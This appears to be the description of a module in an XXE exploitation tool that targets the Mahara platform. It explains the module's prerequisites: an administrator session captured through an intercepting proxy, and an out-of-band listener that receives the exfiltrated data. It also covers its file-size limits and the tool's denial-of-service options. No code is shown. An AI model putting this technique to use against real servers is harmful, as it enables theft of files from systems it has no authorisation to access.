This module creates a new page using administrative privileges and populates it with an RSS feed reader-widget which is then taken advantage of.

Use of this module requires that the user log into the target Mahara system with their browser proxied through Burp Suite, OWASP ZAP, or a similar intercepting proxy in order to obtain the necessary session key and session cookie. The user represented by that session information must be a system administrator within Mahara.

Mahara is a PHP-based application, so directory content enumeration is not possible - a specific target file (or list of specific target files) must be specified. In addition, while text and binary content can both be retrieved, the maximum file size is limited to about 4KB unless certain components on the target were compiled with nonstandard options.

This module uses Yunusov-Osipov-style out-of-band exploitation of a PHP-based application. As a result, it requires the use of an instance of She Wore A Mirrored Mask which is accessible (either directly, or via transparent TCP port-forwarding) to the target system.

This module will generally *not* be successful at sending XXE denial-of-service attacks (--dos-lulz or --dos-quad).